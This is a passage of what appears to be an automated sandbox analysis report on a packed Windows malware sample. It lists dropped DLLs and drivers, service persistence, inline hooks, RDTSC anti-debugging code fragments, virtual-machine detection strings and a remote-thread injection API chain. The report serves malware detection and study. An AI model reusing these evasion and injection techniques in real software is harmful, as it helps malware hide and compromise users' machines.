      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Code function: 2_2_0BFF0001 pushfd ; mov dword ptr [esp], 7D16BF76h 2_2_0BFF7208
      Source: D74384FB8D2C9.exe.0.dr | Static PE information: section name: 0DE entropy: 7.9997364104024875
      Source: D74384FB8D2C9.exe.0.dr | Static PE information: section name: 1TA entropy: 7.978322038476304
      Source: D74384FB8D2C9.exe.0.dr | Static PE information: section name: 3data entropy: 7.935257273389065
      Source: D74384FB8D2C9.exe.0.dr | Static PE information: section name: 8ext entropy: 7.900782660215838
      Source: D74384FB8D2C9.exe.0.dr | Static PE information: section name: 10ta entropy: 7.973925222571074
      Source: 22FD558C8.sys.2.dr | Static PE information: section name: .spa1 entropy: 7.856264468855936
      Source: D74384F.sys.2.dr | Static PE information: section name: .spa1 entropy: 7.856264468855936
      Source: FC14NMPKD.dll.2.dr | Static PE information: section name: .vmp0 entropy: 7.158932382234513
      Source: E816IBB62.dll.2.dr | Static PE information: section name: .vmp0 entropy: 7.927136044627817
      Source: F977IID54.dll.2.dr | Static PE information: section name: .vmp1 entropy: 7.957735490987599
      Source: F04bWTUR.dll.2.dr | Static PE information: section name: .vmp1 entropy: 7.957735490987599
      Source: 8FD7ijlhc.exe.2.dr | Static PE information: section name: .vmp0 entropy: 7.857046294810997
      Source: 8FD7ijlhc.exe.2.dr | Static PE information: section name: .vmp1 entropy: 7.212207379605288
      Source: 5B38DA6A8.dll.2.dr | Static PE information: section name: .vmp1 entropy: 7.9279321384111645
      Source: A2F0jleks.dll.2.dr | Static PE information: section name: .vvvt1 entropy: 7.89458918106719
      Source: D5AESTNHE.dll.2.dr | Static PE information: section name: .vmp0 entropy: 7.933949478599191
      Source: 5801srmps.dll.2.dr | Static PE information: section name: .vmp1 entropy: 7.8581135744322665
      Source: E875FIB50.dll.2.dr | Static PE information: section name: .vmp1 entropy: 7.9425689331629465

      Persistence and Installation Behavior

      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | File created: C:\Windows\SysWOW64\22FD558C8.sys
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | File created: C:\Windows\D74384F.sys
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | File created: C:\Users\user\Desktop\CFA702\D2EDCA7E\IB88701\B81BTTTQM.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | File created: C:\Users\user\Desktop\CFA702\FACCB296\21AAtnoki.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | File created: C:\Users\user\Desktop\CFA702\C39C3E72B\4509OKKGD.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | File created: C:\Users\user\Desktop\CFA702\FEBB9DF1\E816IBB62.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | File created: C:\Users\user\Desktop\CFA702\D2EDCA7E\A806AE3\9683JE76z.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | File created: C:\Users\user\Desktop\CFA702\JF8BA35\F977IID54.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | File created: C:\Users\user\Desktop\CFA702\I2DF4C59\F04bWTUR.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | File created: C:\Users\user\Desktop\CFA702\D2EDCA7E\E03C4D\8FD7ijlhc.exe
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | File created: C:\Users\user\Desktop\CFA702\D2EDCA7E\BCF54838A16\FC14NMPKD.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | File created: C:\Users\user\Desktop\CFA702\GD085C\5801srmps.dll
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe | File created: C:\Program Files (x86)\Google\D74384FB8D2C9.exe
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | File created: C:\Windows\SysWOW64\22FD558C8.sys
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | File created: C:\Users\user\Desktop\CFA702\D2EDCA7E\H4B6E7061C\E875FIB50.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | File created: C:\Users\user\Desktop\CFA702\AB67019A2010\346DgjhcV.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | File created: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | File created: C:\Users\user\Desktop\CFA702\D2EDCA7E\CCDF613EA366\5B38DA6A8.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | File created: C:\Users\user\Desktop\CFA702\D2EDCA7E\B2A26198\8C1AXUVPO.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | File created: C:\Users\user\Desktop\CFA702\D2EDCA7E\IBB2930D\D5AESTNHE.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | File created: C:\Windows\D74384F.sys
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | File created: C:\Users\user\Desktop\CFA702\D2EDCA7E\CF3651B90\C945E611y.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | File created: C:\Users\user\Desktop\CFA702\D2EDCA7E\B790E0\A2F0jleks.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\D74384F
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{32cb138b-8507-4cec-ba14-fc0247804fd4}
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Code function: 2_2_6A6E2680 OpenSCManagerA,CloseServiceHandle,OpenServiceA,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle

      Hooking and other Techniques for Hiding and Protection

      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe | Memory written: PID: 3788 base: 77030005 value: E9 2B BA E8 FF
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe | Memory written: PID: 3788 base: 76EBBA30 value: E9 6B 7E 0C 8A
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe | Memory written: PID: 3788 base: 77030017 value: E9 7C 8E ED FF
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe | Memory written: PID: 3788 base: 76F08E90 value: E9 9B AA 07 8A
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe | Memory written: PID: 3788 base: 75F80005 value: E9 8B 8A ED FF
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe | Memory written: PID: 3788 base: 75E58A90 value: E9 1B AD 12 8B
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe | Memory written: PID: 3788 base: 75F80014 value: E9 1C 02 F0 FF
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe | Memory written: PID: 3788 base: 75E80230 value: E9 0B 36 10 8B
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Memory written: PID: 5448 base: 77030005 value: E9 2B BA E8 FF
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Memory written: PID: 5448 base: 76EBBA30 value: E9 6B 7E 5F 89
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Memory written: PID: 5448 base: 77030017 value: E9 7C 8E ED FF
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Memory written: PID: 5448 base: 76F08E90 value: E9 9B AA 5A 89
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Memory written: PID: 5448 base: 75F80005 value: E9 8B 8A ED FF
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Memory written: PID: 5448 base: 75E58A90 value: E9 1B AD 65 8A
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Memory written: PID: 5448 base: 75F80014 value: E9 1C 02 F0 FF
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Memory written: PID: 5448 base: 75E80230 value: E9 0B 36 63 8A
      Source: unknown | Network traffic detected: HTTP traffic on port 49706 -> 5566
      Source: unknown | Network traffic detected: HTTP traffic on port 5566 -> 49706
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Code function: 2_2_6A6F5C1F IsIconic,GetWindowPlacement,GetWindowRect
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Process information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Code function: 2_2_6A6D3C40
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe | RDTSC instruction interceptor: First address: 1697D1F second address: 127993D instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 mov dword ptr [esp], ebx 0x00000006 push 038D540Eh 0x0000000b jmp 00007F0438974CB3h 0x00000010 rdtsc
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe | RDTSC instruction interceptor: First address: 127993D second address: 17B6C51 instructions: 0x00000000 rdtsc 0x00000002 cwde 0x00000003 xchg dword ptr [esp], esi 0x00000006 cdq 0x00000007 jmp 00007F0438A6770Dh 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe | RDTSC instruction interceptor: First address: 1676EFE second address: 1697D1F instructions: 0x00000000 rdtsc 0x00000002 not dh 0x00000004 mov eax, dword ptr [ecx] 0x00000006 setne dl 0x00000009 jmp 00007F043935563Ah 0x0000000e pop edx 0x0000000f mov dh, bl 0x00000011 mov edx, dword ptr [eax+0Ch] 0x00000014 pushfd 0x00000015 pushfd 0x00000016 jmp 00007F04392EE32Bh 0x0000001b mov dword ptr [esp+1Ch], 00F96144h 0x00000023 push 92FE600Dh 0x00000028 mov dword ptr [esp+1Ch], edi 0x0000002c call 00007F043829A6E8h 0x00000031 mov byte ptr [esp+04h], bh 0x00000035 mov byte ptr [esp], al 0x00000038 mov dword ptr [esp+1Ch], 01526A1Fh 0x00000040 mov byte ptr [esp], 00000054h 0x00000044 jmp 00007F0438D8D733h 0x00000049 jmp 00007F0438BE1473h 0x0000004e mov dword ptr [esp+18h], edx 0x00000052 pushfd 0x00000053 pushad 0x00000054 pushfd 0x00000055 push dword ptr [esp] 0x00000058 push dword ptr [esp+44h] 0x0000005c retn 0048h 0x0000005f jmp 00007F04394AA85Dh 0x00000064 lea edx, dword ptr [eax-157C2B86h] 0x0000006a movzx edx, cl 0x0000006d push ebp 0x0000006e btr bp, 0003h 0x00000073 pushfd 0x00000074 stc 0x00000075 lahf 0x00000076 lea ebp, dword ptr [esp+04h] 0x0000007a neg dl 0x0000007c sub esp, 000004CCh 0x00000082 mov dx, F001h 0x00000086 rdtsc
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe | RDTSC instruction interceptor: First address: 149C80E second address: 1800304 instructions: 0x00000000 rdtsc 0x00000002 cdq 0x00000003 movzx dx, dl 0x00000007 push edi 0x00000008 lea eax, dword ptr [esi+7D9A7D2Bh] 0x0000000e pushad 0x0000000f jmp 00007F043888DEE4h 0x00000014 mov edi, dword ptr [ebp+08h] 0x00000017 rdtsc
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | RDTSC instruction interceptor: First address: BC7D1F second address: 7A993D instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 mov dword ptr [esp], ebx 0x00000006 push 038D540Eh 0x0000000b jmp 00007F0438974CB3h 0x00000010 rdtsc
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | RDTSC instruction interceptor: First address: 7A993D second address: CE6C51 instructions: 0x00000000 rdtsc 0x00000002 cwde 0x00000003 xchg dword ptr [esp], esi 0x00000006 cdq 0x00000007 jmp 00007F0438A6770Dh 0x0000000c rdtsc
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | RDTSC instruction interceptor: First address: BA6EFE second address: BC7D1F instructions: 0x00000000 rdtsc 0x00000002 not dh 0x00000004 mov eax, dword ptr [ecx] 0x00000006 setne dl 0x00000009 jmp 00007F043935563Ah 0x0000000e pop edx 0x0000000f mov dh, bl 0x00000011 mov edx, dword ptr [eax+0Ch] 0x00000014 pushfd 0x00000015 pushfd 0x00000016 jmp 00007F04392EE32Bh 0x0000001b mov dword ptr [esp+1Ch], 004C6144h 0x00000023 push 92FE600Dh 0x00000028 mov dword ptr [esp+1Ch], edi 0x0000002c call 00007F043829A6E8h 0x00000031 mov byte ptr [esp+04h], bh 0x00000035 mov byte ptr [esp], al 0x00000038 mov dword ptr [esp+1Ch], 00A56A1Fh 0x00000040 mov byte ptr [esp], 00000054h 0x00000044 jmp 00007F0438D8D733h 0x00000049 jmp 00007F0438BE1473h 0x0000004e mov dword ptr [esp+18h], edx 0x00000052 pushfd 0x00000053 pushad 0x00000054 pushfd 0x00000055 push dword ptr [esp] 0x00000058 push dword ptr [esp+44h] 0x0000005c retn 0048h 0x0000005f jmp 00007F04394AA85Dh 0x00000064 lea edx, dword ptr [eax-157C2B86h] 0x0000006a movzx edx, cl 0x0000006d push ebp 0x0000006e btr bp, 0003h 0x00000073 pushfd 0x00000074 stc 0x00000075 lahf 0x00000076 lea ebp, dword ptr [esp+04h] 0x0000007a neg dl 0x0000007c sub esp, 000004CCh 0x00000082 mov dx, F001h 0x00000086 rdtsc
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | RDTSC instruction interceptor: First address: 9CC80E second address: D30304 instructions: 0x00000000 rdtsc 0x00000002 cdq 0x00000003 movzx dx, dl 0x00000007 push edi 0x00000008 lea eax, dword ptr [esi+7D9A7D2Bh] 0x0000000e pushad 0x0000000f jmp 00007F043888DEE4h 0x00000014 mov edi, dword ptr [ebp+08h] 0x00000017 rdtsc
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | RDTSC instruction interceptor: First address: 420683 second address: 420683 instructions: 0x00000000 rdtsc 0x00000002 pop ebp 0x00000003 ret 0x00000004 xor edx, edx 0x00000006 mov ecx, 0000003Dh 0x0000000b div ecx 0x0000000d mov eax, dword ptr [ebp-000000B4h] 0x00000013 mov cl, byte ptr [ebp+edx-000000B0h] 0x0000001a mov byte ptr [ebp+eax-70h], cl 0x0000001e jmp 00007F0438D93067h 0x00000020 mov edx, dword ptr [ebp-000000B4h] 0x00000026 add edx, 01h 0x00000029 mov dword ptr [ebp-000000B4h], edx 0x0000002f mov eax, dword ptr [ebp-000000B4h] 0x00000035 cmp eax, dword ptr [ebp-04h] 0x00000038 jnl 00007F0438D930C3h 0x0000003a call 00007F0438DA85FFh 0x0000003f push ebp 0x00000040 mov ebp, esp 0x00000042 rdtsc
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | RDTSC instruction interceptor: First address: 6A6DAF73 second address: 6A6DAF73 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 mov eax, 4325C53Fh 0x00000009 mul ecx 0x0000000b shr edx, 04h 0x0000000e imul edx, edx, 3Dh 0x00000011 sub ecx, edx 0x00000013 mov cl, byte ptr [esp+ecx+6Ch] 0x00000017 mov byte ptr [esp+esi+08h], cl 0x0000001b inc esi 0x0000001c cmp esi, 05h 0x0000001f jl 00007F043852A3E1h 0x00000021 rdtsc
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | RDTSC instruction interceptor: First address: 6A6E097D second address: 6A6E0981 instructions: 0x00000000 rdtsc 0x00000002 mov esi, eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe | Special instruction interceptor: First address: 36FA1BD instructions caused by: Self-modifying code
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Special instruction interceptor: First address: 2C2A1BD instructions caused by: Self-modifying code
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Memory allocated: 5FE0000 memory reserve | memory write watch
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Memory allocated: C790000 memory commit | memory reserve | memory write watch
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Memory allocated: D510000 memory commit | memory reserve | memory write watch
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Memory allocated: D530000 memory commit | memory reserve | memory write watch
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Memory allocated: 117D0000 memory reserve | memory write watch
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Code function: 2_2_6A6E0900 rdtsc
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Window / User API: threadDelayed 3973
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Window / User API: threadDelayed 5251
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\CFA702\D2EDCA7E\IB88701\B81BTTTQM.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\CFA702\FACCB296\21AAtnoki.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\CFA702\C39C3E72B\4509OKKGD.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\CFA702\FEBB9DF1\E816IBB62.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\CFA702\D2EDCA7E\A806AE3\9683JE76z.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\CFA702\I2DF4C59\F04bWTUR.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\CFA702\JF8BA35\F977IID54.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\CFA702\D2EDCA7E\E03C4D\8FD7ijlhc.exe
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\CFA702\D2EDCA7E\BCF54838A16\FC14NMPKD.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\CFA702\GD085C\5801srmps.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\CFA702\D2EDCA7E\H4B6E7061C\E875FIB50.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Dropped PE file which has not been started: C:\Windows\SysWOW64\22FD558C8.sys
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\CFA702\AB67019A2010\346DgjhcV.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\CFA702\D2EDCA7E\CCDF613EA366\5B38DA6A8.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\CFA702\D2EDCA7E\B2A26198\8C1AXUVPO.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\CFA702\D2EDCA7E\IBB2930D\D5AESTNHE.dll
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeDropped PE file which has not been started: C:\Users\user\Desktop\CFA702\D2EDCA7E\CF3651B90\C945E611y.dllJump to dropped file
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeDropped PE file which has not been started: C:\Windows\D74384F.sysJump to dropped file
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeDropped PE file which has not been started: C:\Users\user\Desktop\CFA702\D2EDCA7E\B790E0\A2F0jleks.dllJump to dropped file
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_2-87947
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_2-86730
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_6A6D3C402_2_6A6D3C40
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe TID: 1476Thread sleep time: -68000s >= -30000sJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe TID: 4308Thread sleep time: -3973000s >= -30000sJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe TID: 7064Thread sleep time: -99000s >= -30000sJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe TID: 5664Thread sleep time: -54000s >= -30000sJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe TID: 6516Thread sleep time: -40000s >= -30000sJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe TID: 4308Thread sleep time: -5251000s >= -30000sJump to behavior
      Source: C:\Windows\System32\svchost.exe TID: 5960Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Windows\System32\svchost.exe TID: 5960Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_0BE9BA3C FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,2_2_0BE9BA3C
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_0BE9622C GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,2_2_0BE9622C
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_6A6FB28B __EH_prolog3_GS,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,2_2_6A6FB28B
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_0040D170 _strlen,_strlen,FindFirstFileA,_strlen,_strlen,_strncpy,FindNextFileA,2_2_0040D170
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_0040D640 _strlen,_strlen,FindFirstFileA,_strlen,_strlen,2_2_0040D640
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_0BEB5E38 GetSystemInfo,2_2_0BEB5E38
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeFile opened: C:\Users\userJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeFile opened: C:\Users\user\AppData\Local\Microsoft\WindowsJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeFile opened: C:\Users\user\AppDataJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeFile opened: C:\Users\user\AppData\Local\MicrosoftJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\History\desktop.iniJump to behavior
      Source: E816IBB62.dll.2.drBinary or memory string: VMware
      Source: VIP-#U4f1a#U5458#U7248.exe, VIP-#U4f1a#U5458#U7248.exe.2.drBinary or memory string: ^HGfS
      Source: E816IBB62.dll.2.drBinary or memory string: vmtoolsd.exe
      Source: E816IBB62.dll.2.drBinary or memory string: //./vmmemctl
      Source: E816IBB62.dll.2.drBinary or memory string: "SYSTEM\ControlSet001\Control\VideoVMware Physical Disk Helper ServiceVMToolsvmvss
      Source: VIP-#U4f1a#U5458#U7248.exe, 00000000.00000002.2075023773.0000000003942000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlle
      Source: E816IBB62.dll.2.drBinary or memory string: c:\dg.dllvmtoolsd.exe
      Source: E816IBB62.dll.2.drBinary or memory string: SYSTEM\ControlSet001\Control\VideoVMware Physical Disk Helper Service
      Source: D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007CD5000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4563512115.0000000003072000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2591950560.0000000007CD5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3740580081.000001E17F82B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3748003041.000001E180E5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: D74384FB8D2C9.exe, 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmpBinary or memory string: VMWARE
      Source: E816IBB62.dll.2.drBinary or memory string: VMTools
      Source: D74384FB8D2C9.exe, 00000002.00000002.4563512115.0000000003072000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeAPI call chain: ExitProcess graph end nodegraph_2-87231
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeAPI call chain: ExitProcess graph end nodegraph_2-89455
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeAPI call chain: ExitProcess graph end nodegraph_2-86549
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_6A6E0900 rdtsc 2_2_6A6E0900
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_6A700C0C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_6A700C0C
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_6A6DE3C0 Sleep,GetFileAttributesA,_memset,GetCurrentDirectoryA,OutputDebugStringA,_memset,GetLastError,_sprintf,__wfopen_s,OutputDebugStringA,OutputDebugStringA,_memset,GetCurrentProcessId,OpenFileMappingA,CreateFileMappingA,MapViewOfFile,_memset,__wfopen_s,OutputDebugStringA,OutputDebugStringA,__wfopen_s,OutputDebugStringA,OutputDebugStringA,__wfopen_s,OutputDebugStringA,OutputDebugStringA,2_2_6A6DE3C0
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_6A6D8340 ReadProcessMemory,LoadLibraryA,GetProcAddress,ReadProcessMemory,FreeLibrary,2_2_6A6D8340
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_6A711C3B CreateFileA,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,2_2_6A711C3B
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_6A700C0C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_6A700C0C
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_6A70D159 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_6A70D159
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_6A6FD7EB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_6A6FD7EB

      HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe Memory allocated: C:\Program Files (x86)\Google\D74384FB8D2C9.exe base: 400000 protect: page execute and read and write
Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exe Code function: 2_2_6A6E01F0 OutputDebugStringA,OutputDebugStringA,VirtualAllocEx,WriteProcessMemory,VirtualFreeEx,CloseHandle,GetModuleHandleA,GetProcAddress,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle
